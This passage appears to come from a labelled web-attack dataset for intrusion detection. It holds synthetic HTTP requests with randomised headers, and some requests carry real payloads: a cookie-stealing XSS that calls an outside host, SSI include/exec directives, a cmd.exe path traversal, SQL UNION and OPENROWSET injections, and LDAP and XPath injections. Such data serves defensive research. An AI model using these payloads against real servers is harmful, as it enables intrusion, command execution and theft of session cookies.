If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: "@zy.mKCE-5ORFJEI1Ve"
If-None-Match: "Wo2ebZMJidzslMq"
Max-Forwards: 898
MIME-Version: 1.1
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: Digest realm
Referer: /5ejIaey/oasai/UpyirRyo/e9nrasjt/srhc.cgi
TE: trailers,gzip;q=0.9
Trailer: Expect
User-Agent: peer2okknurEel2q
UA-Disp: 0663,736,8
UA-OS: Windows 95
UA-Color: color8
Via: 0.0 138.99.195.173:79
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 543 www.ydocee8.html "biTseoerdCyyr4oaht" 
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~

oT9=265703&rtrseCEp=nan]allp%Jeeo&eRe3t=5&hlioSt6E7nnflg=49616&aq6aqrs28awwah=<!-- #include   virtual="/var/log/httpd/access.log"  -->&tr=rts&luidyneD7oVeo=mr1CgukE&Ena1f=iAidlf2um&uJgeocesos=2042856&V2htpassCVhtpassp4-vss=1alaihtoewl&cqAj0i6YC0tconc=orheLnesoewt6tesfs&i1Scte5ms=ezsoisBo7n&48ohegj=73

End - Id: 39545
Start - Id: 37990
class: LdapInjection
GET /simwrdtItaaaostn0u/2aMwLa0RxWvA3zd_/khcsOw6VIWe/tji0tI-EmMF1l9wrkyiT.png?tmjnnnieesz=91228455&xlueuh7byNm=evrAeloW&4FCBL_Hhi-a@=eh&li8t=dYY-N3Q&60jtA-QkjJ@=7io%5C&artUhsm=%29+%28++%7C+++%28pbrod%3Dye*%29&Oicvtaag=53962362&ddeoiw0nTtt9pal=vIa3B-3wl%40 HTTP/1.0
Host: 54.33.221.135
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.1, x-mac-icelandic;q=0.0, windows-1257;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-age=25
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="279"
Date: Sat, 27 Jan 07 16:33:44 CET
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: peRu9mr@dtroN.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Sat, 25 Jul 09 24:58:52 UTC
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: Sun, 07 Jun 09 02:16:55 CET
Max-Forwards: 80
MIME-Version: 4.1
Pragma: eSNA='Qd'
Proxy-Authorization: Digest nc=Fe26BDc0
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: /sryaoe4o.rar
TE: chunked,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 3.8; xe-su; rv:3.9.5) Gecko/14617065
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: a9Dy/4.2 245.18.101.238, 2.0 83.216.94.183, HTTP/0.0 193.187.209.100
Transfer-Encoding: offjmi
Upgrade: 9aaia/6.6
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 189.40.115.224
X-Serial-Number: 800649
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37990
Start - Id: 47419
class: XSS
GET /otf1ehphoeearr/tLx6s30aiofheax/ci2kUh/8We9/wq91eM/tsOyro1rci1ngjanisi/riHDsrmiwcw.html?qs-4X3XPX0=67903&tDI=rr_S&gd5iiAxoie69vud=%3Cimg++dynsrc++%3D+++%22+++javascript%3A+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.nengelar.com%2Fcgi-bin%2Fin.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E HTTP/1.1
Host: www.t9etr3eut.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 241.95.180.155
Cookie: Si1sjeogXo7=s|;tenahd9=n0d h7catho<and;rmpoeist3qrir=?erm
Cookie2: $Version="6"
Date: Thu, 18 Oct 07 17:42:44 GMT
ETag: W/"QWUjZ4EE_zuMajbKCL"
Expect: bnh5u=ermwt
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Tue, 03 Jun 08 04:17:58 UTC
If-Unmodified-Since: Mon, 28 Sep 09 17:15:29 CET
If-Match: "xw3EOv.i@E6HniRCb0RF"
If-None-Match: *
If-Range: *
Max-Forwards: 793
MIME-Version: 4.6
Pragma: s='ca3'
Proxy-Authorization: reu2r otrtsOe=aiyqaet
Authorization: NTLM b25hZG9zZWhkeWhwdHZtcWVsaHQxZTl6TWZubGwzdmllV2F1YmM4dG5pYXZyYWVu
Range: 25658-9605
Referer: /entol/sasel/aerlj/hIehtn.mpg
TE: trailers
Trailer: If-Range
User-Agent: t8gsG66kGF http://www.io9cy.biz
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/3.9 www.ct8hao.js
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47419
Start - Id: 37653
class: LdapInjection
PUT /f6xe4k/g1@y0.jpg? HTTP/1.1
Content-Length: 212
Content-Language: Sdincii,Atot,iio
Content-Encoding: deflate
Content-Location: /rel7/shns4cUE/ka79tc/wrTem.mspx
Content-MD5: ZXlidWFzTlY0Y2ZzaXRVbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 19:15:57 UTC
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 115.235.100.251
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-icelandic;q=0.9, iso-8859-9;q=0.7
Accept-Encoding: *
Accept-Language: rciSg-Uau, iIieruob-7;q=0.9, q7i-iV;q=0.4
Cache-Control: no-transform
Client-ip: 88.224.210.21
Cookie: jk4PYQl5=re;Wm0YIVAQZ2Z=21929416;eoe=9;gc=~rsd;twipm=imbLBtXNakd;-RZ@SreplacepositionQBwp-=328029689
Cookie2: $Version="878"
Date: Mon, 17 Jul 06 19:11:01 GMT
ETag: "2Owh1m2iJKJpAV1Rt"
Expect: 100-continue
From: p9ot@shsomno.org
If-Modified-Since: Tue, 29 Nov 05 17:14:32 CET
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: "r7MY7qmMKQfbKI0kE"
If-Range: Sat, 27 Aug 05 03:27:55 CET
Max-Forwards: 05
MIME-Version: 8.2
Pragma: ig='tgart'
Proxy-Authorization: Digest username="oowuyy"
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /ffmhe/xditotr/hitdfM4/n2eti.png
TE: chunked
Trailer: TE
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 5.6; 3l-hw; rv:9.2.8) Gecko/45162028
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: 9.7 153.134.114.32, hi4ile/5.4 www.ggae.html:94
Transfer-Encoding: compress
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hsmgeyeonmva4m= Ietre&R_K94XFr=aallta8&h5dftktchiRy=)( | (aet=palt*)&eoaeEfxx0rrne=ntrnvtaplgthel&iE4cmdq=documentze&bhIMirm=55&l8mc=iygradeFY~s&aodcy=11271&lrS5gntyior4=h(rnto5yt 0ae&eusimvsnrh=8

End - Id: 37653
Start - Id: 43758
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.rfieunrsir.fr:80
Connection: eivntrtt
Accept: image/gif, image/*;q=0.4, image/png;q=0.2
Accept-Charset: iso-8859-6;q=0.9, hz-gb-2312
Accept-Encoding: 
Accept-Language: b-tekae;q=0.4, eKtip-eht4, lvhe-etnrrl, akun-zee4h;q=0.7
Cache-Control: max-age=07907
Client-ip: 251.209.185.79
Cookie: peDthio=17lnd;tLi5okfRnqntfyf=stamincludecneroiBR;apUaLf=e6angsobdtstaag4;oinar=tpbBqpvUalc;herr5TYosikd=eop2
Cookie2: $Version="1"
Date: Mon, 09 Feb 09 15:00:57 GMT
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: wspr4ebT
From: Roarg8@ntrfj.uk
If-Modified-Since: Wed, 19 May 04 09:48:29 UTC
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 94
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: Digest opaque="0s1iie9e"
Range: -541349,6-1
Referer: /daH7sxm/reeSp/eaTFcwh5/int9a1/aent7Nlp.gif
TE: deflate,deflate,chunked;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 4.4; nt-as; rv:4.9.2) Gecko/51641773
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5283x402
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: yhotE/7.5, Kihlr/2.4
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 036162640155
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43758
Start - Id: 49124
class: XPathInjection
GET /eheolss/Nf7Zlocation8_Wis/cDG/bJwDs6UH8r0les3/wl7usuef89spshu/s5_ZaHS1IbANb/2qcQmcnhHNZLxNqh.jpg?GkW3=a_43x&gnhnna8s=rEagtzhhrujeteg6&utue=2364&@Q.ICxterm1unionZopenAV=6udgdobcnenb7twshi&areaggzDlz=sA8&sAA9sjakvrbca=asaO%2Fsefz%2Fyar%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D405%5D+%7C++enl%2Ffoegh%2Ft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++++or++%27si%27%3D+++%27&ort=dLGe&ckdutHdlaR2=19&4hGgEtuhrI=09750552&e0etsEmaot=sns HTTP/1.1
Host: 185.107.188.72
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-9, iso-8859-4;q=0.8, euc-cn;q=0.6, x-mac-ce;q=0.6
Accept-Encoding: identity
Accept-Language: mtiIfne-naswinl;q=0.2, rwhm-7;q=0.0
Cache-Control: max-age=64851
Client-ip: 172.57.198.77
Cookie: qeTmhstd=tX@;uxq8cB6=hF.KIUbQ;ltaatmi8edaueup=453;ttc0=83048532;nosTntserhDyN=mros8~h9dj)r)rs;eairbOnfyhv=8353243
Cookie2: $Version="54"
Date: Tue, 08 Dec 09 24:50:07 GMT
ETag: W/"rJEb8XXRj0p4ChDXT.r"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Thu, 20 Jul 06 07:50:28 GMT
If-Unmodified-Since: Sun, 09 Oct 05 14:08:05 GMT
If-Match: *
If-None-Match: "VTOIe2q2LFqC.MTz"
If-Range: "-m__3mTvQ_-vhY8b"
Max-Forwards: 14
MIME-Version: 4.1
Pragma: aea=d
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Basic c2RKS3Q4bTppc2RtY24x
Range: 245-5,78-,7820-
Referer: /iesqE/rWeKstl/AsyRi/sdkltxoe/wwenc.jsp
TE: gzip;q=0.4,chunked
Trailer: If-Range
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 5.3; He-ee; rv:6.7.5) Gecko/84752343
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: 4.9 www.tmbnsre.jpeg, 4.1 www.awvl.tiff:5550
Transfer-Encoding: compress
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 604 www.ofriesai.html "lf1behhu" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 0092197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49124
Start - Id: 40511
class: SSI
GET /fw/Ncj-1pBROp/pdPw386tido6ulp/etr.php4?7ertftriczno=f%7Cdhi&HiIKTOUaDRIG=eQnezhr&l4XoZB=choloc+t&horiAmdbktreo=gmeerT%27formrms&PpESug1-@=%3C%21--+++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E HTTP/1.1
Host: 30.120.13.73:80
Connection: close
Accept: text/*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.9, compress
Accept-Language: leh-icneqb;q=0.2, n9cl-tO6st, Bnem-ysyhftb, fnei-ooue4;q=0.9
Cache-Control: no-transform
Client-ip: 68.175.116.43
Cookie: teth3elijbia9tg=rkEi;xtcDox=eeD8E0rveeSHNewe;baedyoR=9179;8jytahanc=o5ee11G3
Cookie2: $Version="40"
Date: Tue, 14 Apr 09 13:56:55 GMT
ETag: W/"Gmmz1vZc-Pdv.MyYSuu"
Expect: bah0
From: dtmxe@ioclgro.it
If-Modified-Since: Mon, 24 Jul 06 01:31:00 CET
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: *
If-None-Match: *
If-Range: "vXl6oPc_Wpv1p4b"
Max-Forwards: 11
MIME-Version: 4.1
Pragma: l=bni
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM dHJpZjFla3J3bnJlbnRpZnRybkllZWlTVml0bGlhYWg0c2xzb2lUdA==
Range: 049-19497,328865-,-538
Referer: http://eCotnre.be/rI37/cs1tnelt.tar.gz
TE: trailers,gzip;q=0.5,trailers
Trailer: TE
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 8.4; he-as; rv:2.6.0) Gecko/81295841
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 278x2627
Via: FTP/3.5 154.221.80.105:7, 9.7 www.Rondasse.html, 0.3 245.33.110.7:8105
Transfer-Encoding: identity
Upgrade: PwodS/1.9, ioHu/9.4, qtRd/1.2, ipob/0.8, Hcsnyh/2.2
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40511
Start - Id: 37576
class: LdapInjection
POST /tGD4HWPja@2Y8XL/H7J@winntdcHIYS/9-Lstyleu/brBtFsrtueej/norw/lWsIuu9SN/cvp4tirc6ycgCor/satanonuecnO/VL4A@F18evalVzypfh.msf? HTTP/1.0
Content-Length: 250
Content-Language: ww7PIgl,dbTseus
Content-Encoding: identity
Content-Location: /ceEs/lieea/onritgtP/rntq7.png
Content-MD5: aXM4aUZwc25yb0Q3Y3Nlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Aug 04 15:53:27 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: 69.241.29.42
Connection: hHooloi
Accept: text/xml, application/*;q=0.0
Accept-Charset: iso-8859-3, iso-8859-7, iso-8859-7;q=0.5, shift_jis;q=0.0, ks_c_5601-1987
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="2"
Date: Mon, 02 Oct 06 05:44:00 UTC
ETag: W/"A92uOn1wRLAjIgH"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Fri, 30 May 08 10:14:04 UTC
If-Unmodified-Since: Wed, 24 Sep 08 21:24:13 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Thu, 20 Sep 07 12:48:14 UTC
Max-Forwards: 70
MIME-Version: 0.1
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: Digest username="hxdms"
Range: 36-,-7
Referer: http://www.qedymomU.fr/0err.nsf
TE: trailers,deflate,chunked;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/6.2 (Windows; U; WinNT 1.6; pd-ha; rv:8.6.8) Gecko/91826637
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 223x382
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: deflate
Upgrade: etMr/2.7
Warning: 815 33.130.52.25 "gsi87idmefa9" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nbgoto=1se&Niudti=Dolbin&4JYlogf5=ImfeuayhrsteNin&uqe1=emaGe&rtc=8628&Mlhamweei=ie)(&(objectClass   =  runa*)&dTrltUT4GE=6shneBotfe4lNosi1h&3i4ltnNhihpwR3=style7ozgbin<dt&diibehsu=reo&tse6wn0c=ihiToarnc&V67bgsoundE=556521&kRhNsseotc=440

End - Id: 37576
Start - Id: 44431
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: www.ttorsaGd.fr:00379
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: a-hue;q=0.1
Cache-Control: min-fresh=368
Client-ip: 27.105.36.250
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="74"
Date: Fri, 08 Dec 06 13:52:08 UTC
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Tue, 05 Jun 07 23:20:56 GMT
If-Unmodified-Since: Fri, 28 Jul 06 07:38:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jan 10 11:33:43 UTC
Max-Forwards: 6707
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM Y0xsZGlpbnRudWkyaTIxVW8yZnRla2lpdEd6cG9yZXN0
Authorization: Digest cnonce="secl"
Range: 6-02287,72753-
Referer: /mnh2dai/Ddglo/bveAemI/eeiguegn/shl5ta.php
TE: deflate;q=0.1,chunked
Trailer: Accept-Encoding
User-Agent: trarik/6.4
UA-CPU: Sparc
UA-Disp: 712,4716,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: 8.5 66.3.123.210, 2.7 249.88.93.53
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44431
Start - Id: 47568
class: XSS
GET /l4QDU/eaGNyx_ACJ54QlOI4jv_/eA.gif?tjgtetgndlYtenA=%3Cimg+++++src++%3D++++%22++++javascript%3A++++%5Balert++++%28%27ro0gd%27%29%3B%5D++++%22+%3E&PmO6ypB=728748&_P75cp3whereAlS=7%2Ba&3aelor=34771&tswo=529&@-Bservices9ek=rhie%25o HTTP/1.1
Host: www.6oahzbesi.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 118.106.166.150
Cookie: amaoo=9nateiformnuap;se=77832;VdamdtTcosya=re64lizEouuQesEiat;nyeq3bpogi0yr7=57797554
Cookie2: $Version="4"
Date: Mon, 30 Jan 06 19:34:51 UTC
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Wed, 04 Apr 07 18:07:46 GMT
If-Unmodified-Since: Wed, 09 Mar 05 20:12:53 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 210
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: et1vtr gmhadkba=incdte
Range: 946-214738,54330-8
Referer: http://www.ieta.biz/aot9/heinsgh/dsserey.dll
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: Mozilla/7.6 (compatible; MSIE 1.7; Linux i586; aamiv)
UA-CPU: x86
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 684x889
Via: 4.4 223.46.208.168:26876, 6.9 175.192.77.109, HTTP/5.1 117.93.85.241
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 690 227.131.241.211:00 "btznceu2edneern" "Sat, 08 Jan 05 16:10:42 CET"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47568
Start - Id: 41986
class: SqlInjection
GET /ovFdzUF_pB./child.Ainxp_g-YIsamMd./MRJvy/zhI/fw3maIWv5/nxtOmDgbJQl9OQlfV/jUgGWOPCNwDfDPj.html?q1j-Sstyle=285&eOa=nrkhs&nknwrinirstdir=1989480906&4AY3Euk=%3B++select+++++*+++++from+++++OPENROWSET%28++%27SQLoledb%27%2C%27uid%3Dwec0ocooo%3Bpwd%3DO5netn%3BNetwork%3DDBMSSOCN%3BAddress%3D141.222.51.87%2C68127%3B%27%2C%27select++++*++from++hk%27++%29&yivi1osd=in%3E+u%5D&oiV=369806&dn9aO=styleat%2F1&erksoqeU9h=suoEtlqibyfanw&iooouucdnoesN=aa%40ta&PqYaVoJzCW=tNXK.f5&serhc=3w%5D++muoscsbN+rsg HTTP/1.1
Host: www.ynatw6eo8.st
Connection: lddg
Accept: image/*;q=0.5
Accept-Charset: iso-8859-8-i;q=0.5
Accept-Encoding: compress, compress, gzip;q=0.3, compress;q=0.2
Accept-Language: *;q=0.2
Cache-Control: min-fresh=06912
Client-ip: 41.133.176.17
Cookie: hcg=5375748072
Cookie2: $Version="9"
Date: Wed, 30 Jul 08 02:54:02 GMT
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Thu, 01 Apr 04 13:10:29 UTC
If-Match: "bbdsJU97bl07UuCXVqs"
If-None-Match: *
If-Range: *
Max-Forwards: 4843
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: NTLM b3JlZG5pdG5oY2lvbGhuZXRybm1haW9Fa3RlZWFoWmFpeWVjcm5ubnVlZnRoTQ==
Range: -728027,84041-8,736156-
Referer: /qu14i/2ris/omjeshen.asmx
TE: chunked;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/6.0 (X11; U; Unix 3.5; m5-ao; rv:2.7.3) Gecko/51878657
UA-CPU: Sparc
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 567 141.96.99.110 "rih65mresz2g" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41986
Start - Id: 40312
class: SSI
GET /qpDM/Q8idPNtzWU.php?hrgonsihot=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CHe%5Cloaqelaey%5Ctjr2O.exe+++++d%3A%5Cqal%5Cwww.nsri.org%5Ctq%5Cdatabase.mdb++++%2Fx++++exporttofoxpro%22--%3E HTTP/1.0
Host: 202.43.160.127:024
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: cp-950
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 189.175.1.221
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Tue, 22 Jun 04 22:45:15 GMT
ETag: "AquKEt3-Cwx6JFrf"
Expect: 100-continue
From: eeom@9Ehl.gov
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Wed, 15 Jul 09 01:42:24 UTC
If-Match: "A0W2lZJ84lQ6708_brm"
If-None-Match: *
If-Range: *
Max-Forwards: 460
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: iesa hrtvd=Unmt9
Authorization: NTLM YVJzaXJuYXNlb2lubm50TXNlVG5leWF1ZW9sZWFmY3VF
Range: -2115,0045-233,-51
Referer: /gcfsAtmI/sH6efei/l4Tudrn/snonedk/mdesejZa.js
TE: gzip;q=0.4,trailers
Trailer: If-None-Match
User-Agent: y3ttw (lPfGHoJaC; hRIhCHh3; 0rQJhc8c6b; n_@@NAx)
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0982x101
Via: FTP/3.3 www.1aseiet.css:87, 5.9 www.esrasde.tiff, 8.9 www.29i8s.gif
Transfer-Encoding: deflate
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40312
Start - Id: 42326
class: SqlInjection
GET /hhMdRTM_RGgDEluTkDW/vavLLkDit/vb@./t6FXH-Sj5-/zE80KxY4Naf/nenqwsxl6eVwmn/n@HizamU.cgi?hbmO=n&wn=%5Da&8AVddocument=8WQwH&eiIarpcoo=4MG2OXy-dHx&BrcpGa=97aFNRd&ajq9afnzi=%27+++%29+++++UNION+++++ALL++++SELECT+++++%27vnadaae5%27%2C384%2C9%2C%270hbL%27%2C9+FROM++eishdeeh++++WHERE+%28+++%27%27++%3D%27&heesnirriEra=n&soEtl=slx7p%40u9-mWs&nbtstTeWog=imgqrs HTTP/1.0
Host: 8.122.176.152:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: uensl8-rrdlitje;q=0.0, trrrys-t;q=0.9, liortn-Ebs;q=0.9
Cache-Control: a=Il5iec9a
Client-ip: 64.206.153.107
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="397"
Date: Mon, 29 May 06 14:04:27 UTC
ETag: "Ksz6YAgeD1hO7Ki"
Expect: 100-continue
From: vtsibh@nsti.biz
If-Modified-Since: Sat, 19 Dec 09 02:46:38 CET
If-Unmodified-Since: Fri, 28 Nov 08 01:06:39 UTC
If-Match: "uEU.h86h8s.eDS7QGk1B"
If-None-Match: *
If-Range: Tue, 25 Jul 06 07:07:36 CET
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -416,3-,-523324
Referer: /tcoury.wmn
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: sO56cMtig
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: HTTP/9.8 www.mhes.jpeg, mtoeI/8.9 www.u8cnr.css:4, 2.0 152.63.68.33:20
Transfer-Encoding: deflate
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42326
Start - Id: 49342
class: XPathInjection
